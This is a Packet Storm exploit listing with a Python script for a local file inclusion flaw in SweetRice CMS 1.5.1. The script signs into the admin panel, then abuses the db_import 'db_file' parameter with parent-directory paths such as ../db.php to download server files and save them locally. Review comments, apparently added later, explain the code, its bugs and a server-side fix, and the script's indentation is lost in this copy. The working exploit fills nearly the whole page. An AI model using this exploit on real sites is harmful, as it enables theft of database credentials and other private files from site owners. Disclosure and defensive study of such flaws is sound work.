SweetRice 1.5.1 Local File Inclusion

2016-11-02T00:00:00
ID PACKETSTORM:139498
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-11-02T00:00:00

Description

                                        
                                            `||#/usr/bin/python  
#-*- Coding: utf-8 -*-  
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion  
# Exploit Author: Ashiyane Digital Security Team  
# Date: 03-11-2016  
# Vendor: http://www.basic-cms.org/  
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip  
# Version: 1.5.1  
# Platform: WebApp - PHP - Mysql  
  
import requests  
import os  
from requests import session  
  
# Wipe the terminal before the banner is shown. The command is one of two
# fixed strings selected by platform, so nothing typed by the operator
# reaches the shell here.
clear_command = 'cls' if os.name == 'nt' else 'clear'
os.system(clear_command)
# Banner printed once at start-up; it plays no part in the requests sent later.
# NOTE(review): this is a non-raw string, so `\\` collapses to a single
# backslash and sequences such as `\_` and `\/` are unrecognised escapes that
# recent Python versions warn about. The art also appears to have lost its
# column alignment in this listing.
banner = '''  
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+  
| _________ __ __________.__ |  
| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |  
| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |  
| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ |  
|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |  
| \/ \/ \/ \/ \/ \/ |  
| > SweetRice 1.5.1 Local File Inclusion |  
| > Script Cod3r : Ehsan Hosseini |  
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+  
'''  
  
print(banner)  
  
  
# Read the five operator-supplied values in a fixed order: site host, account
# name, account password, the path placed in the `db_file` request parameter,
# and the local path the response is saved to.
# NOTE(review): the header line names plain `python`; under Python 2, input()
# evaluates what is typed as an expression instead of returning it as text.
# In either version the password is echoed to the terminal as it is typed.
host, username, password, lfipath, xplfile = (
    input(prompt)
    for prompt in (
        "Enter The Target URL(Example : localhost.com) : ",
        "Enter Username : ",
        "Enter Password : ",
        "Enter File To Download(Example : ../db.php) : ",
        "Enter Name of File To Save(Example : ../db.php) : ",
    )
)

# Form fields posted to the sign-in endpoint; `rememberMe` is sent empty.
userinfo = dict(user=username, passwd=password, rememberMe='')
  
# NOTE(review): indentation was lost when this listing was extracted, so the
# nesting below (what sits inside the `with`, which `if` each `else` pairs
# with) can only be inferred from the stray `pass` lines; it is not shown.
#
# Sign-in: the form is posted to the admin area on a requests session so that
# any cookie the server sets is reused by the later request. The URL is built
# with plain http://, so the credentials cross the network unencrypted.
with session() as r:  
login = r.post('http://' + host + '/as/?type=signin', data=userinfo)  
# Success is recognised by a marker string in the response body rather than by
# the status code alone.
success = 'Login success'  
if login.status_code == 200:  
print("[+] Sending User&Pass...")  
# str.find returns -1 when the marker is absent; the `> 1` comparison also
# treats a match at offset 0 or 1 as a failed login.
if login.text.find(success) > 1:  
print("[+] Login Succssfully...")  
else:  
print("[-] User or Pass is incorrent...")  
print("Good Bye...")  
exit()  
pass  
pass  
# The request the advisory is about. `db_file` is concatenated into the query
# string unencoded, and per the advisory title the server returns the file it
# names; the prompt's own example (`../db.php`) is a relative path with a
# parent-directory component. The request reuses the signed-in session, so the
# flaw is presumably reachable only after authentication -- confirm against
# the application source.
# Defender view: the server-side fix is to reduce `db_file` to a bare file
# name inside the directory the import feature is meant to read from and to
# reject everything else. In access logs the request appears as
# `/as/?type=data&mode=db_import&db_file=...&form_mode=save` with `../` or an
# absolute path in `db_file`.
dlfile = r.get('http://' + host +   
'/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')  
  
# Only the status code is checked: an error page served with 200 is saved as
# if it were the requested file.
if dlfile.status_code == 200:  
  
print('[+] Exploit...')  
# The body is written in text mode to a path typed by the operator, with
# open/close instead of a `with` block, so the handle is not closed if write()
# raises. The prompt's example save path is itself a parent-directory path, so
# the output can land outside the working directory.
file = open(xplfile, "w")  
file.write(dlfile.text)  
file.close()  
print('[+] File Saved...')  
print('[+] Exploit By Ehsan Hosseini')  
else:  
print("[-] Error in Exploting...")  
pass ||  
  
`